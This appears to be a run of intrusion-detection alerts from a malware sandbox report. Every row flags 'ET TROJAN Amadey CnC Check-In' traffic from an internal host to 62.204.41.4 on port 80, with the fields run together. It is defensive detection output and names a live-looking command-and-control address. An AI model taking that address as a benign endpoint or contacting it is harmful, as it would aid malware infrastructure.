                          192.168.2.662.204.41.450449802027700 02/07/23-20:04:11.130604TCP2027700ET TROJAN Amadey CnC Check-In5044980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450420802027700 02/07/23-20:04:04.035367TCP2027700ET TROJAN Amadey CnC Check-In5042080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449919802027700 02/07/23-20:01:44.090733TCP2027700ET TROJAN Amadey CnC Check-In4991980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449931802027700 02/07/23-20:01:50.612148TCP2027700ET TROJAN Amadey CnC Check-In4993180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449801802027700 02/07/23-20:01:12.934086TCP2027700ET TROJAN Amadey CnC Check-In4980180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449842802027700 02/07/23-20:01:22.668685TCP2027700ET TROJAN Amadey CnC Check-In4984280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450023802027700 02/07/23-20:02:16.679938TCP2027700ET TROJAN Amadey CnC Check-In5002380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450372802027700 02/07/23-20:03:52.297867TCP2027700ET TROJAN Amadey CnC Check-In5037280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449753802027700 02/07/23-20:00:59.355095TCP2027700ET TROJAN Amadey CnC Check-In4975380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450153802027700 02/07/23-20:02:56.341247TCP2027700ET TROJAN Amadey CnC Check-In5015380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450242802027700 02/07/23-20:03:17.764359TCP2027700ET TROJAN Amadey CnC Check-In5024280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450461802027700 02/07/23-20:04:14.005420TCP2027700ET TROJAN Amadey CnC Check-In5046180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450331802027700 02/07/23-20:03:42.173293TCP2027700ET TROJAN Amadey CnC Check-In5033180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450194802027700 02/07/23-20:03:06.078733TCP2027700ET TROJAN Amadey CnC Check-In5019480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450201802027700 02/07/23-20:03:07.797561TCP2027700ET TROJAN Amadey CnC Check-In5020180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450408802027700 02/07/23-20:04:01.096954TCP2027700ET TROJAN Amadey CnC Check-In5040880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450112802027700 02/07/23-20:02:42.895840TCP2027700ET TROJAN Amadey CnC Check-In5011280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450283802027700 02/07/23-20:03:30.376799TCP2027700ET TROJAN Amadey CnC Check-In5028380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450064802027700 02/07/23-20:02:30.633740TCP2027700ET TROJAN Amadey CnC Check-In5006480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450319802027700 02/07/23-20:03:39.222800TCP2027700ET TROJAN Amadey CnC Check-In5031980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449843802027700 02/07/23-20:01:22.907370TCP2027700ET TROJAN Amadey CnC Check-In4984380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450110802027700 02/07/23-20:02:42.417578TCP2027700ET TROJAN Amadey CnC Check-In5011080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450171802027700 02/07/23-20:03:00.685944TCP2027700ET TROJAN Amadey CnC Check-In5017180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450364802027700 02/07/23-20:03:50.279050TCP2027700ET TROJAN Amadey CnC Check-In5036480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450462802027700 02/07/23-20:04:14.252136TCP2027700ET TROJAN Amadey CnC Check-In5046280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450012802027700 02/07/23-20:02:13.968224TCP2027700ET TROJAN Amadey CnC Check-In5001280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450073802027700 02/07/23-20:02:32.709344TCP2027700ET TROJAN Amadey CnC Check-In5007380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449999802027700 02/07/23-20:02:10.659483TCP2027700ET TROJAN Amadey CnC Check-In4999980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450459802027700 02/07/23-20:04:13.538198TCP2027700ET TROJAN Amadey CnC Check-In5045980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449745802027700 02/07/23-20:00:57.394746TCP2027700ET TROJAN Amadey CnC Check-In4974580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449941802027700 02/07/23-20:01:53.041040TCP2027700ET TROJAN Amadey CnC Check-In4994180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450401802027700 02/07/23-20:03:59.377764TCP2027700ET TROJAN Amadey CnC Check-In5040180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450009802027700 02/07/23-20:02:13.165566TCP2027700ET TROJAN Amadey CnC Check-In5000980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450107802027700 02/07/23-20:02:41.686560TCP2027700ET TROJAN Amadey CnC Check-In5010780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450205802027700 02/07/23-20:03:08.738599TCP2027700ET TROJAN Amadey CnC Check-In5020580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450303802027700 02/07/23-20:03:35.307803TCP2027700ET TROJAN Amadey CnC Check-In5030380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450168802027700 02/07/23-20:02:59.953138TCP2027700ET TROJAN Amadey CnC Check-In5016880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449938802027700 02/07/23-20:01:52.305588TCP2027700ET TROJAN Amadey CnC Check-In4993880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450266802027700 02/07/23-20:03:26.196925TCP2027700ET TROJAN Amadey CnC Check-In5026680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450299802027700 02/07/23-20:03:34.321474TCP2027700ET TROJAN Amadey CnC Check-In5029980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449778802027700 02/07/23-20:01:04.997293TCP2027700ET TROJAN Amadey CnC Check-In4977880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449815802027700 02/07/23-20:01:16.077954TCP2027700ET TROJAN Amadey CnC Check-In4981580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449871802027700 02/07/23-20:01:32.342194TCP2027700ET TROJAN Amadey CnC Check-In4987180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449773802027700 02/07/23-20:01:04.038338TCP2027700ET TROJAN Amadey CnC Check-In4977380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449913802027700 02/07/23-20:01:42.565044TCP2027700ET TROJAN Amadey CnC Check-In4991380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449974802027700 02/07/23-20:02:00.945242TCP2027700ET TROJAN Amadey CnC Check-In4997480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450241802027700 02/07/23-20:03:17.535341TCP2027700ET TROJAN Amadey CnC Check-In5024180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449876802027700 02/07/23-20:01:33.586090TCP2027700ET TROJAN Amadey CnC Check-In4987680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450143802027700 02/07/23-20:02:53.873531TCP2027700ET TROJAN Amadey CnC Check-In5014380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449720802027700 02/07/23-20:00:51.202653TCP2027700ET TROJAN Amadey CnC Check-In4972080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450045802027700 02/07/23-20:02:22.023470TCP2027700ET TROJAN Amadey CnC Check-In5004580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450397802027700 02/07/23-20:03:58.395001TCP2027700ET TROJAN Amadey CnC Check-In5039780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450037802027700 02/07/23-20:02:20.092570TCP2027700ET TROJAN Amadey CnC Check-In5003780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450233802027700 02/07/23-20:03:15.578132TCP2027700ET TROJAN Amadey CnC Check-In5023380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449781802027700 02/07/23-20:01:05.723794TCP2027700ET TROJAN Amadey CnC Check-In4978180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450392802027700 02/07/23-20:03:57.167562TCP2027700ET TROJAN Amadey CnC Check-In5039280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450434802027700 02/07/23-20:04:07.488023TCP2027700ET TROJAN Amadey CnC Check-In5043480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449868802027700 02/07/23-20:01:31.598757TCP2027700ET TROJAN Amadey CnC Check-In4986880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450196802027700 02/07/23-20:03:06.562601TCP2027700ET TROJAN Amadey CnC Check-In5019680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450238802027700 02/07/23-20:03:16.812392TCP2027700ET TROJAN Amadey CnC Check-In5023880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450406802027700 02/07/23-20:04:00.598596TCP2027700ET TROJAN Amadey CnC Check-In5040680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449740802027700 02/07/23-20:00:56.170997TCP2027700ET TROJAN Amadey CnC Check-In4974080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449810802027700 02/07/23-20:01:15.107347TCP2027700ET TROJAN Amadey CnC Check-In4981080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449851802027700 02/07/23-20:01:24.881497TCP2027700ET TROJAN Amadey CnC Check-In4985180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449946802027700 02/07/23-20:01:54.317743TCP2027700ET TROJAN Amadey CnC Check-In4994680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450311802027700 02/07/23-20:03:37.282022TCP2027700ET TROJAN Amadey CnC Check-In5031180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450274802027700 02/07/23-20:03:28.142137TCP2027700ET TROJAN Amadey CnC Check-In5027480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450470802027700 02/07/23-20:04:16.255518TCP2027700ET TROJAN Amadey CnC Check-In5047080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450020802027700 02/07/23-20:02:15.924236TCP2027700ET TROJAN Amadey CnC Check-In5002080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450078802027700 02/07/23-20:02:33.896004TCP2027700ET TROJAN Amadey CnC Check-In5007880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449905802027700 02/07/23-20:01:40.596381TCP2027700ET TROJAN Amadey CnC Check-In4990580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450369802027700 02/07/23-20:03:51.539852TCP2027700ET TROJAN Amadey CnC Check-In5036980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450115802027700 02/07/23-20:02:43.638524TCP2027700ET TROJAN Amadey CnC Check-In5011580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450328802027700 02/07/23-20:03:41.453966TCP2027700ET TROJAN Amadey CnC Check-In5032880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450439802027700 02/07/23-20:04:08.690442TCP2027700ET TROJAN Amadey CnC Check-In5043980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450246802027700 02/07/23-20:03:18.721408TCP2027700ET TROJAN Amadey CnC Check-In5024680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449900802027700 02/07/23-20:01:39.360455TCP2027700ET TROJAN Amadey CnC Check-In4990080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450148802027700 02/07/23-20:02:55.124323TCP2027700ET TROJAN Amadey CnC Check-In5014880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449884802027700 02/07/23-20:01:35.347764TCP2027700ET TROJAN Amadey CnC Check-In4988480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449921802027700 02/07/23-20:01:45.051140TCP2027700ET TROJAN Amadey CnC Check-In4992180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450421802027700 02/07/23-20:04:04.274057TCP2027700ET TROJAN Amadey CnC Check-In5042180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449798802027700 02/07/23-20:01:12.233155TCP2027700ET TROJAN Amadey CnC Check-In4979880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450127802027700 02/07/23-20:02:47.079664TCP2027700ET TROJAN Amadey CnC Check-In5012780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450454802027700 02/07/23-20:04:12.348170TCP2027700ET TROJAN Amadey CnC Check-In5045480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450102802027700 02/07/23-20:02:40.427300TCP2027700ET TROJAN Amadey CnC Check-In5010280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450200802027700 02/07/23-20:03:07.560016TCP2027700ET TROJAN Amadey CnC Check-In5020080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450356802027700 02/07/23-20:03:48.331429TCP2027700ET TROJAN Amadey CnC Check-In5035680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449737802027700 02/07/23-20:00:55.466122TCP2027700ET TROJAN Amadey CnC Check-In4973780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449835802027700 02/07/23-20:01:20.965850TCP2027700ET TROJAN Amadey CnC Check-In4983580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450163802027700 02/07/23-20:02:58.736661TCP2027700ET TROJAN Amadey CnC Check-In5016380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450418802027700 02/07/23-20:04:03.565176TCP2027700ET TROJAN Amadey CnC Check-In5041880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449918802027700 02/07/23-20:01:43.801204TCP2027700ET TROJAN Amadey CnC Check-In4991880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450098802027700 02/07/23-20:02:39.366201TCP2027700ET TROJAN Amadey CnC Check-In5009880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450282802027700 02/07/23-20:03:30.132022TCP2027700ET TROJAN Amadey CnC Check-In5028280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450348802027700 02/07/23-20:03:46.349889TCP2027700ET TROJAN Amadey CnC Check-In5034880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449830802027700 02/07/23-20:01:19.753947TCP2027700ET TROJAN Amadey CnC Check-In4983080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450218802027700 02/07/23-20:03:11.936212TCP2027700ET TROJAN Amadey CnC Check-In5021880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449954802027700 02/07/23-20:01:56.265159TCP2027700ET TROJAN Amadey CnC Check-In4995480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450135802027700 02/07/23-20:02:51.914333TCP2027700ET TROJAN Amadey CnC Check-In5013580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450389802027700 02/07/23-20:03:56.428558TCP2027700ET TROJAN Amadey CnC Check-In5038980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450057802027700 02/07/23-20:02:25.359863TCP2027700ET TROJAN Amadey CnC Check-In5005780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449729802027700 02/07/23-20:00:53.543429TCP2027700ET TROJAN Amadey CnC Check-In4972980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450213802027700 02/07/23-20:03:10.733288TCP2027700ET TROJAN Amadey CnC Check-In5021380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450029802027700 02/07/23-20:02:18.139693TCP2027700ET TROJAN Amadey CnC Check-In5002980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450467802027700 02/07/23-20:04:15.494809TCP2027700ET TROJAN Amadey CnC Check-In5046780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450176802027700 02/07/23-20:03:01.908838TCP2027700ET TROJAN Amadey CnC Check-In5017680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450093802027700 02/07/23-20:02:38.122439TCP2027700ET TROJAN Amadey CnC Check-In5009380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449926802027700 02/07/23-20:01:49.382340TCP2027700ET TROJAN Amadey CnC Check-In4992680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449802802027700 02/07/23-20:01:13.174021TCP2027700ET TROJAN Amadey CnC Check-In4980280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450130802027700 02/07/23-20:02:48.878883TCP2027700ET TROJAN Amadey CnC Check-In5013080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450384802027700 02/07/23-20:03:55.223735TCP2027700ET TROJAN Amadey CnC Check-In5038480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449765802027700 02/07/23-20:01:02.096121TCP2027700ET TROJAN Amadey CnC Check-In4976580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450426802027700 02/07/23-20:04:05.502601TCP2027700ET TROJAN Amadey CnC Check-In5042680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449807802027700 02/07/23-20:01:14.403500TCP2027700ET TROJAN Amadey CnC Check-In4980780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450000802027700 02/07/23-20:02:10.893167TCP2027700ET TROJAN Amadey CnC Check-In5000080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450254802027700 02/07/23-20:03:20.750307TCP2027700ET TROJAN Amadey CnC Check-In5025480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449848802027700 02/07/23-20:01:24.096025TCP2027700ET TROJAN Amadey CnC Check-In4984880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449889802027700 02/07/23-20:01:36.602318TCP2027700ET TROJAN Amadey CnC Check-In4988980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450278802027700 02/07/23-20:03:29.144513TCP2027700ET TROJAN Amadey CnC Check-In5027880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450024802027700 02/07/23-20:02:16.923135TCP2027700ET TROJAN Amadey CnC Check-In5002480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449990802027700 02/07/23-20:02:05.389458TCP2027700ET TROJAN Amadey CnC Check-In4999080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450085802027700 02/07/23-20:02:35.926262TCP2027700ET TROJAN Amadey CnC Check-In5008580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450183802027700 02/07/23-20:03:03.375286TCP2027700ET TROJAN Amadey CnC Check-In5018380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450281802027700 02/07/23-20:03:29.880685TCP2027700ET TROJAN Amadey CnC Check-In5028180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450094802027700 02/07/23-20:02:38.377724TCP2027700ET TROJAN Amadey CnC Check-In5009480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450447802027700 02/07/23-20:04:10.628545TCP2027700ET TROJAN Amadey CnC Check-In5044780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450192802027700 02/07/23-20:03:05.567549TCP2027700ET TROJAN Amadey CnC Check-In5019280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450349802027700 02/07/23-20:03:46.609528TCP2027700ET TROJAN Amadey CnC Check-In5034980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450419802027700 02/07/23-20:04:03.800341TCP2027700ET TROJAN Amadey CnC Check-In5041980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450422802027700 02/07/23-20:04:04.527765TCP2027700ET TROJAN Amadey CnC Check-In5042280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449803802027700 02/07/23-20:01:13.424990TCP2027700ET TROJAN Amadey CnC Check-In4980380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449901802027700 02/07/23-20:01:39.612533TCP2027700ET TROJAN Amadey CnC Check-In4990180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450324802027700 02/07/23-20:03:40.470050TCP2027700ET TROJAN Amadey CnC Check-In5032480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450189802027700 02/07/23-20:03:04.831775TCP2027700ET TROJAN Amadey CnC Check-In5018980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450413802027700 02/07/23-20:04:02.323273TCP2027700ET TROJAN Amadey CnC Check-In5041380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449959802027700 02/07/23-20:01:57.490225TCP2027700ET TROJAN Amadey CnC Check-In4995980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449793802027700 02/07/23-20:01:11.030637TCP2027700ET TROJAN Amadey CnC Check-In4979380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450221802027700 02/07/23-20:03:12.688306TCP2027700ET TROJAN Amadey CnC Check-In5022180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449732802027700 02/07/23-20:00:54.261632TCP2027700ET TROJAN Amadey CnC Check-In4973280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449986802027700 02/07/23-20:02:03.914624TCP2027700ET TROJAN Amadey CnC Check-In4998680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450351802027700 02/07/23-20:03:47.097069TCP2027700ET TROJAN Amadey CnC Check-In5035180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450155802027700 02/07/23-20:02:56.813184TCP2027700ET TROJAN Amadey CnC Check-In5015580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450380802027700 02/07/23-20:03:54.222459TCP2027700ET TROJAN Amadey CnC Check-In5038080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449897802027700 02/07/23-20:01:38.564289TCP2027700ET TROJAN Amadey CnC Check-In4989780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449856802027700 02/07/23-20:01:28.475142TCP2027700ET TROJAN Amadey CnC Check-In4985680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450114802027700 02/07/23-20:02:43.402147TCP2027700ET TROJAN Amadey CnC Check-In5011480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450310802027700 02/07/23-20:03:37.027404TCP2027700ET TROJAN Amadey CnC Check-In5031080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450368802027700 02/07/23-20:03:51.253026TCP2027700ET TROJAN Amadey CnC Check-In5036880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450025802027700 02/07/23-20:02:17.165507TCP2027700ET TROJAN Amadey CnC Check-In5002580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450066802027700 02/07/23-20:02:30.943302TCP2027700ET TROJAN Amadey CnC Check-In5006680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450262802027700 02/07/23-20:03:23.849061TCP2027700ET TROJAN Amadey CnC Check-In5026280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450279802027700 02/07/23-20:03:29.390956TCP2027700ET TROJAN Amadey CnC Check-In5027980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450475802027700 02/07/23-20:04:17.464492TCP2027700ET TROJAN Amadey CnC Check-In5047580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449917802027700 02/07/23-20:01:43.562458TCP2027700ET TROJAN Amadey CnC Check-In4991780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449822802027700 02/07/23-20:01:17.781118TCP2027700ET TROJAN Amadey CnC Check-In4982280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449958802027700 02/07/23-20:01:57.237616TCP2027700ET TROJAN Amadey CnC Check-In4995880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450209802027700 02/07/23-20:03:09.736543TCP2027700ET TROJAN Amadey CnC Check-In5020980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449828802027700 02/07/23-20:01:19.281463TCP2027700ET TROJAN Amadey CnC Check-In4982880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449733802027700 02/07/23-20:00:54.497423TCP2027700ET TROJAN Amadey CnC Check-In4973380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449863802027700 02/07/23-20:01:30.373662TCP2027700ET TROJAN Amadey CnC Check-In4986380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450352802027700 02/07/23-20:03:47.357138TCP2027700ET TROJAN Amadey CnC Check-In5035280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449774802027700 02/07/23-20:01:04.281618TCP2027700ET TROJAN Amadey CnC Check-In4977480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449987802027700 02/07/23-20:02:04.169864TCP2027700ET TROJAN Amadey CnC Check-In4998780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450441802027700 02/07/23-20:04:09.174122TCP2027700ET TROJAN Amadey CnC Check-In5044180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449875802027700 02/07/23-20:01:33.341460TCP2027700ET TROJAN Amadey CnC Check-In4987580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450142802027700 02/07/23-20:02:53.636957TCP2027700ET TROJAN Amadey CnC Check-In5014280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449872802027700 02/07/23-20:01:32.599241TCP2027700ET TROJAN Amadey CnC Check-In4987280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449777802027700 02/07/23-20:01:04.763085TCP2027700ET TROJAN Amadey CnC Check-In4977780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450240802027700 02/07/23-20:03:17.295970TCP2027700ET TROJAN Amadey CnC Check-In5024080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450396802027700 02/07/23-20:03:58.143968TCP2027700ET TROJAN Amadey CnC Check-In5039680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449780802027700 02/07/23-20:01:05.481040TCP2027700ET TROJAN Amadey CnC Check-In4978080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450139802027700 02/07/23-20:02:52.924797TCP2027700ET TROJAN Amadey CnC Check-In5013980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449869802027700 02/07/23-20:01:31.842864TCP2027700ET TROJAN Amadey CnC Check-In4986980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449786802027700 02/07/23-20:01:08.155419TCP2027700ET TROJAN Amadey CnC Check-In4978680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450323802027700 02/07/23-20:03:40.235917TCP2027700ET TROJAN Amadey CnC Check-In5032380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450151802027700 02/07/23-20:02:55.858238TCP2027700ET TROJAN Amadey CnC Check-In5015180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450225802027700 02/07/23-20:03:13.640810TCP2027700ET TROJAN Amadey CnC Check-In5022580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450479802027700 02/07/23-20:04:18.422959TCP2027700ET TROJAN Amadey CnC Check-In5047980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450053802027700 02/07/23-20:02:24.008849TCP2027700ET TROJAN Amadey CnC Check-In5005380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450136802027700 02/07/23-20:02:52.154928TCP2027700ET TROJAN Amadey CnC Check-In5013680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450234802027700 02/07/23-20:03:15.828144TCP2027700ET TROJAN Amadey CnC Check-In5023480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450081802027700 02/07/23-20:02:34.618171TCP2027700ET TROJAN Amadey CnC Check-In5008180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449933802027700 02/07/23-20:01:51.094138TCP2027700ET TROJAN Amadey CnC Check-In4993380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449749802027700 02/07/23-20:00:58.376848TCP2027700ET TROJAN Amadey CnC Check-In4974980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449942802027700 02/07/23-20:01:53.287894TCP2027700ET TROJAN Amadey CnC Check-In4994280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450463802027700 02/07/23-20:04:14.491803TCP2027700ET TROJAN Amadey CnC Check-In5046380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449847802027700 02/07/23-20:01:23.854308TCP2027700ET TROJAN Amadey CnC Check-In4984780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449844802027700 02/07/23-20:01:23.138925TCP2027700ET TROJAN Amadey CnC Check-In4984480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449761802027700 02/07/23-20:01:01.073822TCP2027700ET TROJAN Amadey CnC Check-In4976180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450253802027700 02/07/23-20:03:20.519825TCP2027700ET TROJAN Amadey CnC Check-In5025380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449891802027700 02/07/23-20:01:37.097124TCP2027700ET TROJAN Amadey CnC Check-In4989180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449850802027700 02/07/23-20:01:24.592099TCP2027700ET TROJAN Amadey CnC Check-In4985080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449888802027700 02/07/23-20:01:36.353710TCP2027700ET TROJAN Amadey CnC Check-In4988880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450069802027700 02/07/23-20:02:31.730232TCP2027700ET TROJAN Amadey CnC Check-In5006980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449799802027700 02/07/23-20:01:12.467161TCP2027700ET TROJAN Amadey CnC Check-In4979980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449758802027700 02/07/23-20:01:00.586842TCP2027700ET TROJAN Amadey CnC Check-In4975880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450040802027700 02/07/23-20:02:20.818780TCP2027700ET TROJAN Amadey CnC Check-In5004080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450170802027700 02/07/23-20:03:00.433375TCP2027700ET TROJAN Amadey CnC Check-In5017080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450294802027700 02/07/23-20:03:33.100245TCP2027700ET TROJAN Amadey CnC Check-In5029480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450212802027700 02/07/23-20:03:10.483511TCP2027700ET TROJAN Amadey CnC Check-In5021280192.168.2.662.204.41.4
